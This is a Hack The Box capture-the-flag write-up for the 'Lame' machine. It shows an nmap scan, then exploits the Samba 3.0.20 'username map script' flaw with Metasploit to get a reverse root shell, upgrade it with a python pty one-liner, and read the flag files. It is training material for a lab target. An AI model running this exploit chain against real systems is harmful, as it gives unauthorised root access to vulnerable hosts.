OS Linux
IP: 10.10.10.3
Machine Author: ch4p
Nmap :-
root@kali:~/Desktop# nmap -sS -A -O 10.10.10.3
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 18:17 EST
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Supermicro IPMI BMC (Linux 2.6.24) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-12-13T13:56:42-05:00
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 164.82 ms 10.10.*.*
2 164.95 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.01 seconds
Vulnerabilty:- Samba 3.0.20
Vulnerabilty Description:- This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
Exploit:- Samba “username map script” Command Execution
POC:-
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.*.*:4444</font>
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo UTiuwW6uLQ5WcJXz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "UTiuwW6uLQ5WcJXz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.*.*:4444 -> 10.10.10.3:57285) at 2017-12-16 22:55:59 -0500
id
uid=0(root) gid=0(root)
Now we have a non-interactive root shell, anyway It’s optional if you really want a tty shell or not for this situation atleast and after that we are good to go and read the user and root flags.
python -c 'import pty;pty.spawn("/bin/bash")'
root@lame:/# cd /home
cd /home
root@lame:/home# ls
ls
ftp makis service user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
root@lame:/home/makis# cd /root
cd /root
root@lame:/root# ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root# cat root.txt
Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram
Comments